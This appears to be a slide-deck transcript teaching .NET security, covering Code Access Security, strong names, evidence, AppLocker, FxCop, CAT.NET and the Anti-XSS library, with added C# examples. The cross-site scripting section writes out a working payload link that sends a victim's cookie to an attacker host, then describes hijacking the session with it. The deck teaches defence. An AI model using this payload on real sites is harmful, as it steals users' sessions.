.NET Code security including 4.0 & Tools Jon C. Arce [email protected] Agenda Available Tools .NET Code Access Security FxCop CAT.NET .NET Framework Security Features Code Access Security Role-Based Security Cryptography Securing ASP.NET.


.NET Code security
including 4.0 & Tools
Jon C. Arce
[email protected]
Agenda
Available Tools
.NET Code Access Security
FxCop
CAT.NET
.NET Framework Security Features
Code Access Security
Role-Based Security
Cryptography
Securing ASP.NET Web Applications
Securing ASP.NET Web Services
.NET Code Access Security (CAS)
Policy
Code Access Security (CAS) is the .NET
Common Language Runtime (CLR) mechanism
for maintaining security based on the identity of
code.
You need to sign the code in order to add EXTERNAL
configuration security to the application.
Strong-Named Assemblies
Strong names are
Unique identifiers (containing a public key)
Used to digitally sign assemblies
sn -k MyFullKey.snk
Strong-named assemblies
Prevent tampering
Confirm the identity of the assembly’s
publisher
Allow side-by-side components
Evidence-Based Security
Evidence
Is assessed when an assembly is loaded
Is used to determine the permissions for the
assembly
Can include the assembly’s:
Strong name information
URL
Zone
Authenticode signature
Security Policies (up to .NET 2.0)
Security Entity: Description
Policy: Is set by administrators; is enforced at runtime; simplifies administration; contains permissions; contains code groups
Code Group: Associates similar components; is evidence based; is linked to permission set(s)
Permission Set: Is a set of granted permissions
Permission Sets
Types of Security Checks
Imperative security checks
Create Permission objects
Call Permission methods
Declarative security checks
Use Permission attributes
Apply to methods or classes
Overriding security checks
Use the Assert method
Prevent the stack walk
Security Check Stack Walks
1. An assembly requests access to a method in your assembly
2. Your assembly passes the request to a .NET Framework assembly
3. The security system ensures that all callers in the stack have the required permissions
4. The security system grants access or throws an exception
[Diagram: Call Stack. SomeAssembly (Grant: Execute) makes a call to ReadFile in YourAssembly (Grant: ReadFile), which makes a call to ReadFile in the .NET Framework Assembly (Grant: ReadFile). The permission demand goes to the Security System (Grant access?), which answers with a security exception (access denied).]
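The three kinds of check and the stack walk can be tried in one small console program. This is an added example, not code from the original slides; it assumes the .NET Framework (CAS is not supported on .NET Core), a fully trusted host, and a hypothetical path DemoPath, and it uses PermitOnly() on one frame as a stand-in for the Execute-only SomeAssembly.

```csharp
using System;
using System.Runtime.CompilerServices;
using System.Security;
using System.Security.Permissions;

static class StackWalkDemo
{
    const string DemoPath = @"C:\Temp\demo.txt"; // hypothetical path, never opened

    // Imperative check: create a permission object and call Demand().
    [MethodImpl(MethodImplOptions.NoInlining)]
    static void ImperativeRead()
    {
        new FileIOPermission(FileIOPermissionAccess.Read, DemoPath).Demand();
    }

    // Declarative check: the same demand expressed as an attribute.
    [FileIOPermission(SecurityAction.Demand, Read = DemoPath)]
    [MethodImpl(MethodImplOptions.NoInlining)]
    static void DeclarativeRead() { }

    // Override: Assert() stops the stack walk at this frame, so the
    // callers above it are not checked for this permission.
    [MethodImpl(MethodImplOptions.NoInlining)]
    static void AssertingRead()
    {
        new FileIOPermission(FileIOPermissionAccess.Read, DemoPath).Assert();
        try { ImperativeRead(); }
        finally { CodeAccessPermission.RevertAssert(); }
    }

    // Stand-in for SomeAssembly (Grant: Execute): PermitOnly() makes this
    // frame count as holding nothing but the Execution permission.
    [MethodImpl(MethodImplOptions.NoInlining)]
    static string CallAsExecuteOnly(Action target)
    {
        new SecurityPermission(SecurityPermissionFlag.Execution).PermitOnly();
        try { target(); return "access granted"; }
        catch (SecurityException) { return "security exception"; }
        finally { CodeAccessPermission.RevertPermitOnly(); }
    }

    static void Main()
    {
        Console.WriteLine("imperative:  " + CallAsExecuteOnly(ImperativeRead));
        Console.WriteLine("declarative: " + CallAsExecuteOnly(DeclarativeRead));
        Console.WriteLine("asserted:    " + CallAsExecuteOnly(AssertingRead));
    }
}
```

The asserting method is the pattern to review most carefully in real code: it vouches for every caller above it, so it should validate its inputs and assert the narrowest permission that works.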
Permission Requests
Used by developers to state required
permissions
Implemented by attributes
Prevents an assembly from loading when
minimum permissions are not available
using System.Security.Permissions;

// I will only run if I can call unmanaged code
[assembly: SecurityPermission(SecurityAction.RequestMinimum, UnmanagedCode = true)]
Create a code group
Control Panel
Specify Membership Condition
Select a permission set
Naming the permission set
Assign permission sets
Setting File I/O permissions
Completing Code Group Creation
Security Policy in the v4 CLR
In previous releases of the .NET Framework,
CAS policy applied to all assemblies loaded into
an application.
The major areas that are seeing updates with
the v4 CLR are:
Security policy
Security transparency
APTCA (AllowPartiallyTrustedCallersAttribute)
Evidence
AppDomain Managers
http://blogs.msdn.com/shawnfa/archive/2009/05/20/net-4-0security.aspx
Sandboxing Privileged Code
Permissions Demanded then Asserted
AllowPartiallyTrustedCallers attribute added
Assembly installed into the global assembly cache
[Diagram: Partial Trust Web Application (<trust level="Medium" originUrl="" />) -> Wrapper Assembly (Sandboxed Code) -> Resource Access -> Secured Resource]
Evidence Types
Evidence: Description
Application directory: The application's installation directory.
Hash: Cryptographic hash such as SHA1.
Publisher: Software publisher signature; that is, the Authenticode signer of the code.
Site: Site of origin, such as http://www.microsoft.com.
Strong name: Cryptographically strong name of the assembly.
URL: URL of origin.
Zone: Zone of origin, such as Internet Zone.
AppDomain Managers
In .NET, the basic unit of execution is NOT the
process, rather it is that of the Application
Domain.
With AppDomains, multiple applications can run
in the same process, thereby sharing the .NET
runtime libraries.
The HostSecurityManager class applies policy and
permissions. This technique determines the
security for the entire AppDomain at once.
Software Restriction Policy
You can use software restriction policies to
identify software and to control its ability to run
on your local computer, organizational unit,
domain, or site.
Control the ability of software to run on your
system.
Permit users to run only specific files on
multiuser computers.
Control whether software restriction policies
affect all users or just certain users on a
computer.
Prevent an application from running (for example, a virus).
New Software Restriction Policies
1. Sign the application
2. Set the publisher
Publish -> Options
Windows Application Locker
AppLocker is a new feature in Windows 7 and
Windows Server 2008 R2 that allows you to
specify which users or groups can run particular
applications in your organization based on
unique identities of files.
If you use AppLocker, you can create rules to
allow or deny applications from running, such as:
executable files (.exe and .com), scripts (.js, .ps1,
.vbs, .cmd, and .bat), Windows Installer files (.msi
and .msp), and DLL files (.dll and .ocx).
Isolated Storage
Provides a virtual file system
Allows quotas
Implements file system isolation
based on:
Application identity
User identity
IsolatedStorageFile isoStore =
IsolatedStorageFile.GetUserStoreForAssembly();
TOOLS TO HELP WITH SECURITY
FxCop
FxCop is a code analysis tool that checks .NET
managed code assemblies for conformance to
the Microsoft .NET Framework Design
Guidelines. It inspects assemblies for more than
200 defects in the following areas:
Library design
Globalization
Naming conventions
Performance
Interoperability and portability
Security
Usage
FxCop demo
Microsoft Code Analysis Tool .NET
CAT.NET is a static code analysis tool like
FxCop but specially built for managed code
and with a strong focus on security
vulnerabilities.
CAT.NET scans managed code for specific
security vulnerabilities like:
SQL injection
LDAP injection
Cross Site Scripting
XPATH injection
and many other categories of vulnerabilities.
CAT.NET demo
Cross Site Scripting
XSS stands for Cross Site Scripting. An XSS attack is
when an attacker manages to inject JavaScript code (or
sometimes other code) into a website, causing it to
execute the code.
If an attacker makes a specially crafted link and sends it
to an unsuspecting victim, and the victim clicks the
link, a piece of JavaScript code can be executed
that sends the victim's cookie away to a CGI script.
Cross-site scripting carried out on websites accounted for
roughly 80% of all documented security
vulnerabilities as of 2007.
XSS Attack !
Send the victim an email with the following HTML:
<a href="http://archives.cnn.com/2001/US/09/16/inv.binladen.denial/?tw=<script>document.location.replace('http://freewebhost.com/ph33r/steal.cgi?'+document.cookie);</script>">Check this Article Out! </a>
The user would of course click the link and be
led to the CNN news article, but at the same time
the attacker would have been able to direct the user
towards his specially crafted URL; he now has the
user's cookie.
Using the Firefox cookie editor, the attacker copies and
pastes the victim's cookie and uses it for himself.
Microsoft Anti-Cross Site Scripting
Library V3.0
The Microsoft Anti-Cross Site Scripting Library
V3.0 (Anti-XSS V3.0) is an encoding library
designed to help developers protect their
ASP.NET web-based applications from XSS
attacks.
It differs from most encoding libraries in that it
uses the white-listing technique -- sometimes
referred to as the principle of inclusions -- to
provide protection against XSS attacks.
http://www.microsoft.com/downloads/details.aspx?familyid=051EE83C-5CCF-48ED-8463-02F56A6BFC09&displaylang=en
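The white-listing idea can be shown with a small encoder that passes through only a fixed set of known-safe characters and turns everything else into a numeric character reference. This is an added, simplified illustration for HTML element content, not the Anti-XSS library's implementation or API; the class name, the allow-list and the sample input are assumptions made for the example.

```csharp
using System;
using System.Text;

static class WhitelistHtmlEncoder
{
    // The allow-list: only these characters are written through unchanged.
    static bool IsAllowed(char c)
    {
        return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
               (c >= '0' && c <= '9') ||
               c == ' ' || c == '.' || c == ',' || c == '-' || c == '_';
    }

    // Everything outside the allow-list becomes a numeric character reference.
    public static string Encode(string input)
    {
        if (string.IsNullOrEmpty(input)) return string.Empty;
        var sb = new StringBuilder(input.Length * 2);
        for (int i = 0; i < input.Length; i++)
        {
            char c = input[i];
            if (IsAllowed(c)) { sb.Append(c); continue; }

            int codePoint = c;
            if (char.IsSurrogate(c))
            {
                bool pair = char.IsHighSurrogate(c) && i + 1 < input.Length
                            && char.IsLowSurrogate(input[i + 1]);
                // A valid pair is one code point; a lone surrogate becomes U+FFFD.
                codePoint = pair ? char.ConvertToUtf32(c, input[++i]) : 0xFFFD;
            }
            sb.Append("&#").Append(codePoint).Append(';');
        }
        return sb.ToString();
    }

    static void Main()
    {
        // Constructed sample input, modelled on the tw= query parameter above.
        string tw = "<script>alert(document.cookie)</script>";
        // The value is encoded at the point where it is written into the page.
        Console.WriteLine("<p>" + Encode(tw) + "</p>");
    }
}
```

Because the decision is made on what is allowed rather than on what is known to be dangerous, a character nobody thought to block is still encoded.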
Session Summary
.NET Framework Security Features
Code Access Security
Role-Based Security
Cryptography
Securing ASP.NET Web Applications
Securing ASP.NET Web Services
Next Steps
1. Stay informed about security
Sign up for security bulletins:
http://www.microsoft.com/security/security_bulletins/alerts2.asp
Get the latest Microsoft security guidance:
http://www.microsoft.com/security/guidance/
2. Get additional security training
Find online and in-person training seminars:
http://www.microsoft.com/seminar/events/security.mspx
Find a local CTEC for hands-on training:
http://www.microsoft.com/learning/
For More Information
Microsoft Security Site (all audiences)
http://www.microsoft.com/security
MSDN Security Site (developers)
http://msdn.microsoft.com/security
TechNet Security Site (IT professionals)
http://www.microsoft.com/technet/security
Questions and Answers